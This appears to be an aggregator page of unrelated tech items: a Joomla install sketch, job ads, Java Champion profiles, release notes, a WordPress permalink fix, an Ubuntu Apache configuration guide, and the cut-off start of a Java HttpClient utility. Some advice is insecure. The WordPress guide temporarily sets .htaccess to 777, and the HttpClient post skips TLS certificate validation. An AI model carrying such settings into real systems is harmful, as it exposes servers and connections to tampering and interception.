How to Install Joomla with Apache on Debian 9 (Stretch)   
Joomla is one of the most popular and widely supported open-source content management system (CMS) platforms in the world. It can be used to build, organize, manage, and publish content for websites, blogs, intranets, and mobile applications. This tutorial describes the installation of Joomla with the Apache web server and MariaDB on Debian 9.
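As a rough sketch, the whole installation boils down to a handful of commands (package names are the usual Debian 9 ones; the Joomla download URL, version, and database credentials are placeholders you should replace):

apt-get update
apt-get install -y apache2 mariadb-server php php-mysql php-xml php-zip libapache2-mod-php

# create a database and user for Joomla (pick your own password)
mysql -u root -p -e "CREATE DATABASE joomla; GRANT ALL PRIVILEGES ON joomla.* TO 'joomla'@'localhost' IDENTIFIED BY 'secret';"

# unpack Joomla into the web root (URL/version are placeholders)
cd /var/www/html
wget https://downloads.joomla.org/.../Joomla-x.y.z.tar.gz
tar xzf Joomla-x.y.z.tar.gz
chown -R www-data:www-data /var/www/html

systemctl restart apache2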
          Ghacks Deals: The Ultimate Data Infrastructure Architect Bundle (94% off)   

The Ultimate Data Infrastructure Architect Bundle is an eLearning bundle that includes five courses and five ebooks covering ElasticSearch, Apache Spark 2, AWS, MongoDB, and Hadoop 2. All courses are designed for users of all experience levels, and access is lifetime. The following courses are included in the bundle: Learning ElasticSearch 5.0 -- […]




          Re: Configure HTTPS Tomcat to Remedy   

Discussion successfully moved from Developer Community to Remedy AR System

 

Did you modify the "server.xml" from Tomcat? Do you have an Apache httpd or IIS server or is Tomcat "alone"?

Is Tomcat on Windows or Linux?


          New Java Champions: Holly Cummins, Aleksey Shipilev, and David Heffelfinger   

Welcome three new Java Champions: Holly Cummins, Aleksey Shipilev, and David Heffelfinger

Holly Cummins has been a Java engineer since 2001. She was one of the core engineers on the IBM J9 JVM, working on Garbage Collection (GC) and Just-In-Time (JIT) compilation. She is currently a technical lead for the IBM Bluemix Garage.

Holly is also a committer and PMC member on the Apache Aries project, which melds the OSGi and Java EE programming models. She created several wearable projects connected to a backend server to demonstrate the low power requirements of modern application servers, and the suitability of Java for embedded application servers.

Holly is the co-author of Enterprise OSGi in Action (Manning). She has published on a range of subjects, including performance myths, garbage collection tuning principles, enterprise OSGi, Java on Raspberry Pis, microservices, automation, and the importance of fun in a development culture. She is a frequent speaker at conferences including Devoxx and JavaOne. Follow her on Twitter @holly_cummins

Aleksey Shipilev is a principal software engineer at Red Hat. He is the author of the Java Microbenchmark Harness (JMH), a project for examining the performance of Java coding constructs; prior to JMH, programmers wrote their own benchmark harnesses, which were often fraught with errors. He also wrote JCStress, a toolkit for testing concurrent code, and developed Java Object Layout (JOL), which uses Unsafe, JVMTI, and the Serviceability Agent (SA) heavily to decode the actual object layout, footprint, and references.

Aleksey is now a committer on the new GC project, Shenandoah. He is very active on mailing lists such as Java Concurrency Interest and those of the JMH and OpenJDK projects. Follow him on Twitter @shipilev

David Heffelfinger is an independent consultant based in the Washington, DC area. He is a member of the NetBeans Dream Team and is part of the JavaOne content committee. 

David has written seven books on Java EE, application servers, NetBeans, JasperReports, and Wicket. His titles include Java EE 7 Development with NetBeans 8, Java EE 7 with GlassFish 4 Application Server, and JasperReports 3.5 For Java Developers.

David has been speaking at JavaOne every year since 2012. He is a frequent speaker at NetBeans Day in San Francisco, showcasing NetBeans features that greatly enhance the development of Java EE applications. Follow him on Twitter @ensode

The Java Champions are an exclusive group of passionate Java technology and community leaders who are community-nominated and selected under a project sponsored by Oracle. Learn more about Java Champions.
          Congratulations New Java Champion Bob Paulin   

Welcome New Java Champion Bob Paulin 

Bob Paulin is an independent consultant working for different IT firms. He has 15 years of experience as a developer and has contributed to open source software for the past 10 years.

Bob is currently an ASF member and actively contributes to Apache Tika, Apache Felix, and Apache Sling. He was nominated as a JCP Outstanding Adopt-a-JSR participant for his involvement with Java EE 8. He has run numerous JDK 9 workshops in the Chicago area.

Bob is the co-host of JavaPubHouse.com, a podcast on a range of Java topics, standards, tools, and techniques. He also participates regularly in Java Off-Heap, a podcast about Java technology news.

Bob has run the Devoxx4Kids and GotoJr conferences in Chicago, allowing kids to hack on Minecraft, play with Lego robots, and use conductive Play-Doh. These efforts have enriched the lives of students and are helping inspire them to pursue technical careers. Follow him on Twitter @bobpaulin

Java Champions are an exclusive group of passionate Java technology and community leaders who are community-nominated and selected under a project sponsored by Oracle. Learn more about Java Champions


          (IT) Java Build and Config Engineer - Banking   

Rate: Negotiable   Location: City of London   

Role: Senior Java Build and Config Engineer - Banking

Key Essential Skills: Java Configuration Build & DevOps Engineer, SDLC, JIRA, TeamCity, TDD, MS Azure, solid background in automated testing, investment banking knowledge of the Apache stack (Flink, Spark, Ignite).

Outline: Thebes Group is a leading UK-wide IT Infrastructure Technology Consultancy. We are well known for our extensive talent pool of highly competent IT professionals and exclusive academy programmes, which provide a great opportunity to undertake technical training in core disciplines. Thebes works with a number of leading vendors, government, financial institutions and insurance companies, including investment banks, brokers and hedge funds. To see our list of core capabilities please click here.

Essential Experience:
- Configuration/build specialist with extensive DevOps experience
- Proven hands-on Java skills, including related tooling
- 5+ years' experience in software programming languages - JavaScript and C++ to run Flink
- Experience with scalability and setting up/influencing code optimisation
- Experience using cloud-based systems
- Solid understanding of software development life cycle (SDLC) methodologies such as Waterfall and Agile
- Experience working within the financial sector

Role & Responsibilities:
- Work constructively with other team members to discuss and solve technical problems
- Communicate effectively with other geographically dispersed teams across the business unit
- Work in conjunction with business representatives to understand and evolve business requirements and come up with pragmatic and supportable designs
- Analyse, design and build such projects and manage them through the full project life cycle
- Handle projects that deal with rating, billing and finance; certain complex projects require coordination with external systems

Thebes provides IT solutions & services differently from most other IT service providers. As an Assured Outcome Provider (AOP), we have spent fifteen years willingly sharing the client's risk by focusing on outputs (i.e. quality service & solutions and return on investment) rather than inputs (i.e. price lists and headcount). We do this by fitting our skills, solutions & capabilities to needs, augmenting our staff with enthusiastic professionals from our Academy Programme, and remaining flexible as our clients' needs change. Thebes Group is a leading IT services and technology consultancy based in the City of London and Milton Keynes. Established in 1992, we are a full-service provider that is 100% focused on delivering client value. We design, develop and implement leading technology solutions and resources which help you run your business better. Thebes - Led by Passion, Driven by Innovation and Dedicated to Results. Thebes may process any personal information supplied
 
Rate: Negotiable
Type: Contract
Location: City of London
Country: UK
Contact: Thebes Group
Advertiser: Thebes IT Solutions Ltd
Start Date: ASAP
Reference: JS-JALJAVA BUILD AND CO

          (IT) Senior Java Build and Config Engineer - Banking   

Rate: Negotiable   Location: City of London   

Key Essential Skills: Java Configuration Build & DevOps Engineer, SDLC, JIRA, TeamCity, TDD, MS Azure, solid background in automated testing, investment banking knowledge of the Apache stack (Flink, Spark, Ignite).

Outline: Thebes Group is a leading UK-wide IT Infrastructure Technology Consultancy. We are well known for our extensive talent pool of highly competent IT professionals and exclusive academy programmes, which provide a great opportunity to undertake technical training in core disciplines. Thebes works with a number of leading vendors, government, financial institutions and insurance companies, including investment banks, brokers and hedge funds.

Essential Experience:
- Configuration/build specialist with extensive DevOps experience
- Proven hands-on Java skills, including related tooling
- 10+ years' experience in software programming languages - JavaScript and C++ to run Flink
- Experience with scalability and setting up/influencing code optimisation
- Experience using cloud-based systems
- Solid understanding of software development life cycle (SDLC) methodologies such as Waterfall and Agile
- Experience working within the financial sector

Role & Responsibilities:
- Work constructively with other team members to discuss and solve technical problems; mentoring and coaching
- Communicate effectively with other geographically dispersed teams across the business unit
- Work in conjunction with business representatives to understand and evolve business requirements and come up with pragmatic and supportable designs
- Analyse, design and build such projects and manage them through the full project life cycle
- Handle projects that deal with rating, billing and finance; certain complex projects require coordination with external systems

Thebes provides IT solutions & services differently from most other IT service providers. As an Assured Outcome Provider (AOP), we have spent fifteen years willingly sharing the client's risk by focusing on outputs (i.e. quality service & solutions and return on investment) rather than inputs (i.e. price lists and headcount). We do this by fitting our skills, solutions & capabilities to needs, augmenting our staff with enthusiastic professionals from our Academy Programme, and remaining flexible as our clients' needs change. Thebes Group is a leading IT services and technology consultancy based in the City of London and Milton Keynes. Established in 1992, we are a full-service provider that is 100% focused on delivering client value. We design, develop and implement leading technology solutions and resources which help you run your business better. Thebes - Led by Passion, Driven by Innovation and Dedicated to Results. Thebes may process any personal information supplied in relation to your application. By providing your information, you consent to Thebes using
 
Rate: Negotiable
Type: Contract
Location: City of London
Country: UK
Contact: Thebes Group
Advertiser: Thebes IT Solutions Ltd
Start Date: ASAP
Reference: JS-JALSENIOR JAVA BUILD

          (IT) Full Stack Developer   

Rate: £350 - £450 per Day   Location: Glasgow, Scotland   

Full Stack Developer - 12 month contract - Glasgow City Centre

One of Harvey Nash's leading FS clients is looking for an experienced full stack developer with an aptitude for general infrastructure knowledge. This will be an initial 12 month contract; however, the likelihood of extension is high. The successful candidate will be responsible for creating strategic solutions across a broad technology footprint. Experience within financial services would be advantageous, although not a prerequisite.

Skill Set:
- Previous full-stack development experience with C#/C++/Java, Visual Studio, .NET, Windows/Linux web development
- Understanding of secure code development/analysis
- In-depth knowledge of how software works
- Development using SQL and relational databases (e.g. SQL, DB2, Sybase, Oracle, MQ)
- Windows automation and scripting (PowerShell, WMI)
- Familiarity with common operating systems and entitlement models (Windows, Red Hat Linux/Solaris)
- Understanding of network architecture within an enterprise environment (e.g. firewalls, load balancers)
- Experience of developing in a structured deployment environment (DEV/QA/UAT/PROD)
- Familiarity with the Software Development Life Cycle (SDLC)
- Experience with source control and CI systems (e.g. Git, Perforce, Jenkins)
- Experience with unit and load testing tools
- Experience with code review products (e.g. Crucible, FishEye)
- Excellent communication/presentation skills and experience working with distributed teams
- Candidates should demonstrate a strong ability to create technical, architectural and design documentation

Desired Skills:
- Any experience creating (or working with) a "developer desktop" (dedicated desktop environment for developers)
- Experience of the Linux development environment
- An interest in cyber security
- Knowledge of defense-in-depth computing principles
- Experience with security products and technologies (e.g. CyberArk, PKI)
- Systems management, user configuration and technology deployments across large, distributed environments (e.g. Chef, ZooKeeper)
- Understanding of core Windows infrastructure technologies (e.g. Active Directory, GPO, CIFS, DFS, NFS)
- Monitoring tools (e.g. SCOM, Netcool, WatchTower)
- Experience with Apache/Tomcat web server virtualisation
- Design patterns and best practices
- Agile development: planning, retrospectives, etc.

To apply for this role or to discuss it in more detail please call me and send a copy of your latest CV.
 
Rate: £350 - £450 per Day
Type: Contract
Location: Glasgow, Scotland
Country: UK
Contact: Cameron MacGrain
Advertiser: Harvey Nash Plc
Start Date: ASAP
Reference: JS-329601/001

          (IT) Hadoop Architect/Developer   

Location: Foster City, CA   

Key Responsibilities: Visa is currently seeking a Senior Hadoop Architect/Developer with extensive experience in RDBMS data modelling/development and Tableau developer experience in the finance area to deliver the Corporate Analytics new strategic framework initiative. This BI platform provides analytical/operational capability to various business domains used by Corporate Finance Systems. The developer will be primarily responsible for designing, developing and implementing Hadoop-framework ETL using relational databases, with Tableau reporting on top of it. The new Hadoop framework will be used to rebuild the Oracle Financial Analytics/P2P/Spend/Fixed Assets solution from OBIA from scratch. The individual should have a finance business background with extensive experience in OBIA Fixed Assets, P2P, Financial Analytics, Spend Analytics, and Projects, and should be expert in Hadoop framework components such as Sqoop, Hive, Impala, Oozie, Spark, HBase, and HDFS.

- Architect, design and implement column-family schemas of Hive and HBase within HDFS; assign schemas and create Hive tables; manage and deploy HDFS/HBase clusters
- Develop efficient Pig and Hive scripts with joins on datasets using various techniques; assess the quality of datasets for a Hadoop data lake; apply different HDFS formats and structures such as Parquet and Avro to speed up analytics
- Fine-tune Hadoop applications for high performance and throughput; troubleshoot and debug any Hadoop ecosystem runtime issues
- Hands-on experience configuring and using Hadoop ecosystem components such as Hadoop MapReduce, HDFS, HBase, Hive, Sqoop, Spark, Impala, Pig, Oozie, ZooKeeper and Flume
- Strong programming skills in Scala or Python to work on Spark
- Experience converting core ETL logic using PySpark SQL or Scala
- Good experience with Apache Hadoop MapReduce programming, Pig scripting and distributed applications on HDFS
- In-depth understanding of data structures and algorithms
- Experience managing and reviewing Hadoop log files
- Experience setting up standards and processes for Hadoop-based application design and implementation
- Experience importing and exporting data with Sqoop between HDFS and relational database systems
- Experience in object-oriented analysis and design (OOAD) and software development using UML methodology; good knowledge of J2EE and core Java design patterns
- Experience managing Hadoop clusters using the Cloudera Manager tool
- Very good experience with the complete project life cycle (design, development, testing and implementation) of client/server and web applications
- Experience connecting Hadoop framework components to Tableau reporting
- Expert in Tableau data blending and data modeling
- Create functional and technical design documentation
- Perform unit and QA testing of data loads and develop scripts for data validation
- Support QA, UAT, SIT and
 
Type: Contract
Location: Foster City, CA
Country: United States of America
Contact: Baljit Gill
Advertiser: Talentburst, Inc.
Reference: NT17-11842

          (IT) Senior Java Developer - Financial   

Rate: £400 - 450 per Day   Location: Lancashire   

Location: North West, United Kingdom. Rate: £400 - 450 per day. Duration: 6 months initially. Position: Contract.

Gibbs Hybrid is currently recruiting for a Senior Java Developer to join a large client of ours based in Lancashire or Stockport. This role is an initial 6-month contract paying c. £400 per day.

The role: You will be a Senior Java Developer who, in addition to coding, can coach junior developer teams and teach Java best practice, leading a team of 10 Java developers.

You will have: experience of Java, JUnit, Apache Camel, Apache CXF, web service design/deployment, and Java front-end work. Experienced Java developer, ideally with Apache Camel or equivalent.

If this role is of interest please click 'Apply Now' with an up-to-date CV for more information.
 
Rate: £400 - 450 per Day
Type: Contract
Location: Lancashire
Country: UK
Contact: Jenna Brown
Advertiser: Gibbs Hybrid Workforce Solutions
Email: Jenna.Brown.2240D.8C39F@apps.jobserve.com
Start Date: ASAP
Reference: JSCSPJBJD

          (IT) Senior Java Engineer - Dublin   

Rate: Euros 500 +   Location: Dublin   

A financial services powerhouse client of mine is looking to add 2 senior engineers to their team to work on a large-scale platform with 20,000 users. They are looking to implement and add new tools to their platform to ensure that their business and trading platforms are at a level that enables the business to grow threefold this year. Paying excellent daily rates, and a chance to join a team at the forefront of my client's innovation centre.

What they are looking for:
- At least 5 years of experience in delivery of innovative software solutions (Java)
- Experience migrating enterprise-grade solutions to cloud offerings
- Solid application development background with a focus on Java, in an enterprise environment
- Experience setting up large-scale CI/CD pipelines
- Familiarity with software development tools such as JIRA, Confluence, SVN, Artifactory and others
- Experience with continuous integration servers (TeamCity, Jenkins)
- Experience with virtualization solutions (vRealize)
- Experience working with containers (Docker)
- Ability to partner with senior stakeholders both in the team and across teams
- Dedicated self-starter, with the ability to drive a team and its contribution

Skills that would be advantageous to have:
- Maven/Gradle/MSBuild/CMake
- Apache/Tomcat skills
- Grails/Groovy
- Track record of Linux Java application debugging and tuning
- Work experience in large multinational corporations
- Familiarity with agile methodologies

Contact Brendan (see below)
 
Rate: Euros 500 +
Type: Contract
Location: Dublin
Country: Ireland
Contact: Brendan Hennessy
Advertiser: Stelfox Ltd
Email: Brendan.Hennessy.3712A.B45A6@apps.jobserve.com
Start Date: ASAP
Reference: JS

          Release of the Docker 17.06 container virtualization management system   
A release of Docker 17.06 has been presented, a toolkit for managing isolated Linux containers that provides a high-level API for manipulating containers at the isolation level of individual applications. Docker lets you run arbitrary processes in isolation without worrying about assembling the container's contents, and then transfer and clone the containers created for those processes to other servers, taking over all the work of creating, maintaining, and supporting containers. The toolkit is based on the standard isolation mechanisms built into the Linux kernel: namespaces and control groups (cgroups). The Docker code is written in Go and distributed under the Apache 2.0 license.
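As a quick illustration of the workflow described above, using standard Docker CLI commands (the image, container name, and registry are arbitrary examples):

# run an isolated process without assembling the container contents yourself
docker run -d --name web nginx:alpine

# snapshot the running container into an image...
docker commit web mysite:v1

# ...and move it to another server via a registry
docker tag mysite:v1 registry.example.com/mysite:v1
docker push registry.example.com/mysite:v1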
          JBoss Tools Team: JBoss Tools 4.5.0.AM1 for Eclipse Oxygen.0   

Happy to announce the 4.5.0.AM1 (Developer Milestone 1) build for Eclipse Oxygen.0.

Downloads available at JBoss Tools 4.5.0 AM1.

What is New?

Full info is at this page. Some highlights are below.

Server Tools

EAP 7.1 Server Adapter

A server adapter has been added to work with EAP 7.1. It is currently released in Tech Preview mode only, since the underlying WildFly 11 continues to be under active development with substantial opportunity for breaking changes. This new server adapter includes support for incremental management deployment, like its upstream WildFly 11 counterpart.

Removal of Event Log and other Deprecated Code

The Event Log view has been removed. The standard Eclipse log should be used for errors and other important messages regarding server state transitions.

Hibernate Tools

Hibernate Search Support

We are glad to announce support for Hibernate Search. The project was started by Dmitrii Bocharov in the Google Summer of Code program; in the current JBoss Tools release it has been transferred from Dmitrii's repository into the jbosstools-hibernate repository and has become part of the JBoss family of tools.

Functionality

The plugin was conceived as a kind of Luke tool inside Eclipse: more convenient than launching a separate application, because it picks up the configuration directly from your Hibernate configuration.

Two options were added to the console configuration submenu: Index Rebuild and Index Toolkit. They become available when you use the Hibernate Search libraries (i.e. when they are on the build path of your application, e.g. via Maven).

[Screenshot: configuration menu items]
Index Rebuild

When introducing Hibernate Search in an existing application, you have to create an initial Lucene index for the data already present in your database.

The option "Index Rebuild" will do so by re-creating the Lucene index in the directory specified by the hibernate.search.default.indexBase property.

[Screenshots: Hibernate Search indexed entities; Hibernate Search configuration properties]
Index Toolkit

"Open Index Toolkit" submenu of the console configuration opens an "Index Toolkit" view, which has three tabs: Analyzers, Explore Documents, Search.

Analyzers

This tab allows you to view the results produced by different Lucene analyzers. The combo box contains all classes in the workspace which extend org.apache.lucene.analysis.Analyzer, including custom implementations created by the user. As you type the text you want to analyse, the result immediately appears on the right.

[Screenshot: Analyzers tab]
Explore Documents

After creating the initial index you can now inspect the Lucene Documents it contains.

All entities annotated as @Indexed are displayed in the Lucene Documents tab. Tick the checkboxes as needed and load the documents. Iterate through the documents using arrows.

[Screenshot: Lucene Documents inspection]
Searching

The plugin passes the input string from the search text box to the QueryParser which parses it using the specified analyzer and creates a set of search terms, one term per token, over the specified default field. The result of the search pulls back all documents which contain the terms and lists them in a table below.

[Screenshot: Search tab]
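Under the hood this is plain Lucene. A minimal sketch of the same parse-and-search flow (Lucene 5.x-era API; the field name and index path are arbitrary examples):

import org.apache.lucene.analysis.standard.StandardAnalyzer;
import org.apache.lucene.index.DirectoryReader;
import org.apache.lucene.queryparser.classic.QueryParser;
import org.apache.lucene.search.IndexSearcher;
import org.apache.lucene.search.Query;
import org.apache.lucene.search.ScoreDoc;
import org.apache.lucene.store.FSDirectory;
import java.nio.file.Paths;

public class SearchSketch {
    public static void main(String[] args) throws Exception {
        // parse the input over a default field using the chosen analyzer
        QueryParser parser = new QueryParser("title", new StandardAnalyzer());
        Query query = parser.parse("hibernate search");

        // pull back all documents that contain the resulting terms
        try (DirectoryReader reader = DirectoryReader.open(
                FSDirectory.open(Paths.get("/var/lucene/indexes/MyEntity")))) {
            IndexSearcher searcher = new IndexSearcher(reader);
            for (ScoreDoc hit : searcher.search(query, 10).scoreDocs) {
                System.out.println(searcher.doc(hit.doc).get("title"));
            }
        }
    }
}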

Demo

Docker

Docker Client Upgrade

The version of docker-client used by the Docker Tooling plug-ins has been upgraded to 6.1.1 for the 3.0.0 release of the Docker Tooling feature.

Forge

Forge Runtime updated to 3.7.1.Final

The included Forge runtime is now 3.7.1.Final. Read the official announcement here.

[Screenshot: startup]

Enjoy!

Jeff Maury


          Apache HBase: The NoSQL Database for Hadoop and Big Data   

Use HBase when you need random, real-time read/write access to your Big Data. The goal of the HBase project is to host very large tables — billions of rows multiplied by millions of columns — on clusters built with commodity hardware. HBase is an open-source, distributed, versioned, column-oriented store modeled after Google’s Bigtable. Just as Bigtable leverages the distributed data storage provided by the Google File System, HBase provides Bigtable-like capabilities on top of Hadoop and HDFS.
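For a feel of the data model, a minimal sketch using the HBase shell (table and column-family names are arbitrary examples):

hbase shell

create 'metrics', 'd'                                      # table with one column family
put 'metrics', 'row1', 'd:value', '42'                     # random, real-time write
get 'metrics', 'row1'                                      # random, real-time read
scan 'metrics', {STARTROW => 'row0', STOPROW => 'row9'}    # range scan over row keys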


          Wordpress change permalinks to Postname cause Page Not Found   

Originally posted on: http://geekswithblogs.net/sathya/archive/2017/06/16/wordpress-change-permalinks-to-postname-cause-page-not-found.aspx

When you select "Post name" permalinks in the WordPress admin page, it sometimes does not work.
The reasons are as follows.

* If the admin permalinks page itself shows a message along the lines of "if you had given write permissions to .htaccess we could have done this ourselves", do the following:

1. Go to the WordPress installation folder via FTP, or if you are connected over SSH, navigate to the folder
2. Ensure that you have 644 permissions on the .htaccess and wp-config.php files (if you use FileZilla, right-click the file and check that the following are ticked:
Owner permissions: Read and Write
Group permissions: Read
Public permissions: Read)
3. Also ensure that 755 permissions are set on all the subfolders under your installation directory
4. Go to the admin permalinks page again, choose the post name option and save; the message mentioned above should go away
5. If you still see the message, try setting the permissions on the .htaccess file to 777 and repeat step 4
6. After step 5 you should no longer see the message

7. Try to navigate to the post you have created
8. If it works, go back to FileZilla, change the permissions back to 644, and everything should still work fine
9. If it still doesn't work and you get a 404 Page Not Found, do the following:
10. SSH to the server
11. vim /etc/apache2/apache2.conf (it might be httpd.conf in some setups)
12. Search for the word Directory
13. You will see a couple of Directory sections (e.g. <Directory /usr/asdf>...</Directory>)
14. Insert an additional section like the one below. (Make sure you use your complete WordPress installation path; the path given below is just an example. For the given path, AllowOverride is what matters, so ensure AllowOverride is set to All for the folder you name in the Directory tag.)

<Directory /var/www/myfolder/htdocs/wpinstallationfolder/>

        Options Indexes FollowSymLinks

        AllowOverride All

        Require all granted

</Directory>

15. Restart your Apache server.
In my case that is service apache2 restart;
it can also be service httpd restart
16. Refresh the sample blog post you created, or create a new blog post from the admin page and try navigating to it; it should all work fine.


If it still doesn't work, the rewrite module may not be enabled.
Ensure that this line is uncommented (remove the # in front of it) in /etc/apache2/apache2.conf (or httpd.conf):

LoadModule rewrite_module modules/mod_rewrite.so

Restart the Apache server, then refresh the page and try again.

Finally, remember to do step 8, if you have not done it already.
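For reference, the permission and module steps above condense into a few commands on a Debian/Ubuntu box (a sketch; adjust the path to your own WordPress installation):

cd /var/www/myfolder/htdocs/wpinstallationfolder   # example path from above
chmod 644 .htaccess wp-config.php                  # steps 2 and 8
find . -type d -exec chmod 755 {} \;               # step 3
a2enmod rewrite                                    # Debian/Ubuntu helper for the LoadModule line
service apache2 restart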

          Ubuntu apache2 configuration explained (including virtual host setup)   

The configuration you find online is for Apache 2.2; with the same configuration, Apache 2.4 refuses access and logs "apache AH01630: client denied by server configuration". The fix is simply to replace

  1. Order deny,allow  
  2. Allow from all  

with

  1. Require all granted  

and it works.
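In context, the change looks like this (a sketch; the directory path is an example):

<Directory /var/www/mysite>
    Options Indexes FollowSymLinks
    # Apache 2.2 style, rejected by 2.4:
    #   Order deny,allow
    #   Allow from all
    # Apache 2.4 style:
    Require all granted
</Directory>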

===============================================================

Under Windows, Apache usually has just one configuration file, httpd.conf. But after I installed Apache2 on Ubuntu Linux with apt-get install apache2, I found to my surprise that its httpd.conf (in the /etc/apache2 directory) was empty! It turns out that the configuration of Ubuntu's Apache package is not as simple as on Windows: the individual settings are split across different configuration files. It looks complicated, but on reflection the design is actually quite sensible.

Strictly speaking, the configuration file of Ubuntu's Apache (or should that be Apache on Linux in general? I am not familiar with the apache packages of other distributions) is /etc/apache2/apache2.conf, and Apache reads this file's settings automatically at startup. Other configuration files, such as httpd.conf, are pulled in via Include directives. These Include lines can be found in apache2.conf:

# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf

# Include all the user configurations:
Include /etc/apache2/httpd.conf

# Include ports listing
Include /etc/apache2/ports.conf
……
# Include generic snippets of statements
Include /etc/apache2/conf.d/

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/

Together with the comments, the general purpose of each configuration file is clear. Of course, you are free to put all of the settings into apache2.conf, or httpd.conf, or any other single configuration file; Apache2's split is just a fairly good habit.

The most important thing to know after installing Apache is where the web document root is; on Ubuntu the default is /var/www. How do we know? apache2.conf has no DocumentRoot entry and httpd.conf is empty, so it must be in some other file. After searching, I found it in /etc/apache2/sites-enabled/000-default, which contains content like this:

NameVirtualHost *
<VirtualHost *>
        ServerAdmin webmaster@localhost

        DocumentRoot /var/www/
        ……
</VirtualHost>

This is for configuring virtual hosts, which was of no use to me, so I commented out the Include /etc/apache2/sites-enabled/ line in apache2.conf and set DocumentRoot in httpd.conf to a directory under my home directory, which is more convenient for development.

Now look at the rest of the /etc/apache2 directory. We just saw the sites-enabled directory referenced from apache2.conf, and there is also a sites-available directory under /etc/apache2. What is that for? In fact, sites-available holds the real configuration files, while sites-enabled only contains symbolic links pointing to them; you can confirm this with ls /etc/apache2/sites-enabled/. So if apache has several virtual hosts configured, with each virtual host's configuration file stored under sites-available, enabling and disabling a virtual host becomes very easy: creating a link in sites-enabled to a virtual host's configuration file enables it; to disable a virtual host, simply delete the corresponding link, with no need to touch the configuration file itself.
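On Debian and Ubuntu there are helper scripts that manage these symlinks for you, equivalent to creating or removing the links by hand:

sudo a2ensite mysite        # creates the symlink in sites-enabled
sudo a2dissite mysite       # removes the symlink, leaving sites-available untouched
sudo service apache2 reload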

======================================================

mods-available and mods-enabled are analogous to the sites-available and sites-enabled directories described above: these two directories hold the configuration files and links for Apache's feature modules. After I installed the PHP module with apt-get install php5, these two directories gained php5.load, php5.conf, and links pointing to those two files. This directory structure makes enabling and disabling a given Apache module very convenient.

The last file to mention is ports.conf, which sets the ports Apache uses. If you need to adjust the default port settings, editing this file is recommended. Or, if you find it truly redundant, you can remove the Include /etc/apache2/ports.conf line from apache2.conf and set the Apache port in httpd.conf instead.

The default directory layout on Ubuntu is a bit unusual. In Ubuntu both modules and virtual hosts have two directories: available and enabled. The available directory stores valid configuration that is inactive on its own; it only takes effect once linked into enabled with ln. This is very convenient for debugging and everyday use, but if you don't know about it in advance, finding things can be a little troublesome.

/etc/apache2/sites-available holds the virtual host configuration, but it has no effect on its own; the file must be linked into the sites-enabled directory to take effect.

  

<VirtualHost *:80>
        ServerName your-domain
        # use the rails project's public directory as the document root
        DocumentRoot /path/to/rails-app/public
        <Directory /path/to/rails-app/public>
                Options ExecCGI FollowSymLinks
                AllowOverride all
                allow from all
                Order allow,deny
        </Directory>
        ErrorLog /var/log/apache2/error-your-domain.log
</VirtualHost>

 

====================================================

 

What is Virtual Hosting?
Simply put, the same server can handle more than one domain. Suppose www.example1.net and www.example2.net both point to the same server, and the web server supports virtual hosting; then www.example1.net and www.example2.net can reach different web spaces (directories storing website files) on that same server.

 

Configuration format

In Apache2, the active site definitions are stored in /etc/apache2/sites-available/<name>. We can add an entry in the following format to create a new virtual host; copying most of the default file over is enough. Remember to change DocumentRoot to the default directory, set the path in the Directory section, and make sure the port does not clash with other virtual hosts:

<VirtualHost *:80>
    # put your site's name after ServerName
    ServerName www.demo.com

    # put the site administrator's e-mail address after ServerAdmin,
    # so people can contact the administrator when there is a problem
    ServerAdmin fish@demo.com

    # put the directory holding the site content (the user's personal directory) after DocumentRoot
    DocumentRoot /home/fish/www/html

    <Directory /home/fish/www/html>
        Options Indexes FollowSymLinks MultiViews
        Require all granted
    </Directory>

    ErrorLog /home/fish/www/html/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /home/fish/www/html/access.log combined

    ServerSignature On
</VirtualHost>


If your server has multiple IPs, and different IPs serve different virtual hosts, you can change it to:


...

Enabling the configuration

The content we configured above is only an "available" virtual host; for it to actually take effect, it must be placed under the /etc/apache2/sites-enabled folder. We can use the ln command to create a pair of linked files:

sudo ln -s /etc/apache2/sites-available/www.demo.com.conf /etc/apache2/sites-enabled/www.demo.com.conf 

Check the syntax and restart the web service

To be on the safe side, check the syntax before restarting the service:


sudo apache2ctl configtest

If there are no errors, restart Apache:


sudo /etc/init.d/apache2 -k restart

 



 
          httpClient HTTPS one-way, no certificate validation (httpClient connection pool)    
Without further ado, straight to the code. Previously I always called code someone else had written; now that I have some time, I worked it out myself. The functionality is as follows:
1. httpClient + HTTP + connection pool;
2. httpClient + HTTPS (one-way, no certificate validation) + connection pool.

The HTTPS configuration in %TOMCAT_HOME%/conf/server.xml:
<Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true" 
     maxThreads="150" scheme="https" secure="true" 
     clientAuth="false" keystoreFile="D:/tomcat.keystore" 
     keystorePass="heikaim" sslProtocol="TLS"  executor="tomcatThreadPool"/> 
Here clientAuth="false" means client-certificate authentication is not enabled; the connection simply goes over HTTPS.



package com.abin.lee.util;

import org.apache.commons.collections4.MapUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.http.*;
import org.apache.http.client.HttpRequestRetryHandler;
import org.apache.http.client.config.CookieSpecs;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.protocol.HttpClientContext;
import org.apache.http.config.Registry;
import org.apache.http.config.RegistryBuilder;
import org.apache.http.conn.ConnectTimeoutException;
import org.apache.http.conn.socket.ConnectionSocketFactory;
import org.apache.http.conn.socket.PlainConnectionSocketFactory;
import org.apache.http.conn.ssl.NoopHostnameVerifier;
import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.impl.conn.PoolingHttpClientConnectionManager;
import org.apache.http.message.BasicHeader;
import org.apache.http.message.BasicNameValuePair;
import org.apache.http.protocol.HttpContext;
import org.apache.http.util.EntityUtils;

import javax.net.ssl.*;
import java.io.IOException;
import java.io.InterruptedIOException;
import java.net.UnknownHostException;
import java.nio.charset.Charset;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.*;

/**
* Created with IntelliJ IDEA.
* User: abin
* Date: 16-4-18
* Time: 上午10:24
* To change this template use File | Settings | File Templates.
*/
public class HttpClientUtil {
private static CloseableHttpClient httpsClient = null;
